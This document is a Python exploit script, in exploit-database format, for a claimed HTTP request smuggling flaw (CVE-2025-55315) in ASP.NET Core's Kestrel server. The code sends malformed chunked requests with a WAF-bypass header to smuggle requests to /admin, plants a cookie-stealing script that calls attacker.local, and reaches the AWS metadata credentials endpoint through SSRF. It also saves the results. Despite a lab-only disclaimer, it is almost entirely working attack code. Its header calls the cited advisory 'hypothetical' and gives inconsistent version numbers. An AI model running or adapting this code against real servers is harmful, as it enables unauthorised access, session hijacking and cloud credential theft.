ASP.net 8.0.10 - Bypass

# Exploit Title: ASP.net  8.0.10 - Bypass
# Date: 2025-11-03
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# CVE: CVE-2025-55315
# Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment)
# Platform: remote
# Type: webapps
# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
#
# Description:
#   This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
#   unpatched versions of .NET Kestrel due to improper handling of malformed
#   chunk extensions (LF-only line endings). The script performs:
#     1. Automatic fingerprinting to detect vulnerable instances
#     2. Auth bypass to access restricted endpoints (/admin)
#     3. Session hijacking via response queue poisoning (JS cookie stealer)
#     4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
#   Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
#
#   The vulnerability allows full remote compromise: authentication bypass,
#   session theft, and internal network access — all from a single HTTP request.
#
#   Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
#
# IMPORTANT SAFETY :
#   -  DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
#   - Use only in isolated environments (VM, Docker with --network none).
#   - All payloads are educational and non-destructive by design.
#   - Modify payloads only within your controlled lab.
#
# References:
#   - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
#   - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315


from __future__ import annotations
import socket
import ssl
import time
import argparse
import json
import os
from typing import Tuple, Optional

DEFAULT_TIMEOUT = 3.0
READ_CHUNK = 4096
REPORT_DIR = "kestrel_desync_reports"
os.makedirs(REPORT_DIR, exist_ok=True)

# ------------------ Utilities ------------------
def now_iso() -> str:
    return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())

def hexdump(b: bytes, maxlen: int = 200) -> str:
    shown = b[:maxlen]
    hexed = ' '.join(f"{x:02x}" for x in shown)
    return f"{hexed} ..." if len(b) > maxlen else hexed

def save_file(path: str, data: bytes) -> None:
    try:
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] Saved: {path}")
    except Exception as e:
        print(f"[!] Save failed: {e}")

# ------------------ Networking ------------------
def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(DEFAULT_TIMEOUT)
    try:
        if use_tls:
            ctx = ssl.create_default_context()
            s = ctx.wrap_socket(s, server_hostname=host)
        s.connect((host, port))
        s.sendall(data)

        parts = []
        while True:
            try:
                chunk = s.recv(READ_CHUNK)
                if not chunk: break
                parts.append(chunk)
            except socket.timeout:
                break
        resp = b''.join(parts)

        s.settimeout(0.2)
        try:
            s.recv(1)
            open_flag = True
        except:
            open_flag = False
        s.close()
        return resp, open_flag
    except Exception:
        return None, False

# ------------------ Request Builder (WAF Bypass) ------------------
def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:
    headers = [
        f"{method} {path} HTTP/1.1",
        "Host: localhost",
        "Transfer-Encoding: chUnKEd",  # WAF Bypass
        "Content-Type: text/plain",
    ]
    if extra_headers:
        headers.extend(extra_headers)
    headers.extend(["", ""])
    return "\r\n".join(headers).encode() + body

# ------------------ Fingerprint ------------------
def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
    print(f"[*] Fingerprinting {host}:{port}...")
    payload = b"1\nx\n0\n\n"
    req = build_chunked("POST", "/", payload)
    resp, _ = send_http(host, port, req, use_tls)
    if resp and b"400" not in resp.split(b'\r\n', 1)[0]:
        print(f"[!] VULNERABLE: Accepted LF-only chunk!")
        return True, resp
    print(f"[+] Patched: 400 Bad Request")
    return False, resp

# ------------------ Exploit Chain ------------------
def exploit_chain(host: str, port: int, use_tls: bool):
    results = []

    # 1. Auth Bypass
    print(f"[!] 1. Auth Bypass → /admin")
    smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n"
    req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"])
    resp1, _ = send_http(host, port, req1, use_tls)
    if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
        results.append("Auth Bypass: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
    else:
        results.append("Auth Bypass: FAILED")

    # 2. Session Hijacking
    print(f"[!] 2. Session Hijacking → JS Stealer")
    js_payload = (
        b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n"
        b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n"
        b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
    )
    req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload)
    send_http(host, port, req2, use_tls)
    results.append("Session Hijack: INJECTED")

    # 3. SSRF
    print(f"[!] 3. SSRF → AWS Metadata")
    ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n"
    req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf)
    resp3, _ = send_http(host, port, req3, use_tls)
    if resp3 and b"role" in resp3:
        results.append("SSRF: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
    else:
        results.append("SSRF: FAILED")

    return results

# ------------------ Reporting ------------------
def save_json_report(host: str, port: int, use_tls: bool, results: list):
    report = {
        "target": f"{host}:{port}",
        "tls": use_tls,
        "timestamp": now_iso(),
        "cve": "CVE-2025-55315",
        "status": "VULNERABLE",
        "waf_bypass": "chUnKEd",
        "exploits": results
    }
    path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(report, f, indent=2)
    print(f"[+] JSON Report: {path}")

# ------------------ CLI ------------------
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="host:port or host:port:tls")
    args = parser.parse_args()

    parts = args.target.split(":")
    host = parts[0]
    port = int(parts[1])
    use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")

    print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n")

    is_vuln, _ = fingerprint(host, port, use_tls)
    if not is_vuln:
        print("[+] Target is patched. Exiting.")
        return

    results = exploit_chain(host, port, use_tls)
    save_json_report(host, port, use_tls, results)

    print(f"\n[+] Exploitation chain completed!")
    print(f"[+] All files in: {REPORT_DIR}")

if __name__ == "__main__":
    main()